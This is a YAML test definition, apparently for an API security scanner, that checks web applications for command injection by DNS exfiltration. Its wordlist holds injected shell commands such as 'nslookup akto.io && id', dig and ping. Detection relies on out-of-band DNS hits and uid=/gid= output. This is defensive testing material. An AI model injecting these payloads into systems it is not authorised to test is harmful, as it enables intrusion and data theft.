---
id: COMMAND_INJECTION_DNS_EXFILTRATION
info:
  name: "Command Injection - DNS Exfiltration"
  description: "Tests whether the application is vulnerable to command injection through DNS exfiltration payloads."
  details: "This test injects DNS lookup commands to check if the application executes them, indicating a command injection vulnerability. DNS exfiltration can be used to bypass network restrictions and exfiltrate data."
  impact: "Command injection vulnerabilities allow attackers to execute arbitrary commands on the server, potentially leading to complete system compromise, unauthorized data access, and data exfiltration."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: COMMAND_INJECTION_DNS_EXFILTRATION
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://twitter.com/trbughunters/status/1283133356922884096"
  cwe:
    - CWE-77
    - CWE-78
  cve:
    - CVE-2023-25826
    - CVE-2023-41031

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  method:
    neq: "OPTIONS"
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  or:
    - request_payload:
        for_one:
          key:
            regex: .*
            extractMultiple: bodyKeys
          value:
            extract: bodyValue
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys
          value:
            regex: .*
            extract: queryValue

wordLists:
  # DNS exfiltration payloads
  dnsExfiltrationPayloads:
    - "nslookup akto.io"
    - "nslookup akto.io && id"
    - "dig akto.io"
    - "host akto.io"
    - "ping -c 1 akto.io"

execute:
  type: single
  requests:
    - req:
        - send_ssrf_req:
            url: "https://test-services.akto.io/store_uuid/${random_uuid}"
        - modify_body_param:
            ${bodyKeys}: "${dnsExfiltrationPayloads}"
        - modify_query_param:
            ${queryKeys}: "${dnsExfiltrationPayloads}"

validate:
  or:
    # OOB detection - DNS exfiltration hit
    - ssrf_url_hit: ${random_uuid}
    # Direct response indicators
    - response_payload:
        length:
          gt: 0
        contains_either:
          - "Server:"
          - "Address:"
          - "Name:"
          - "uid="
          - "gid="
        not_contains:
          - Error
          - Internal Server
          - <html>
          - </html>
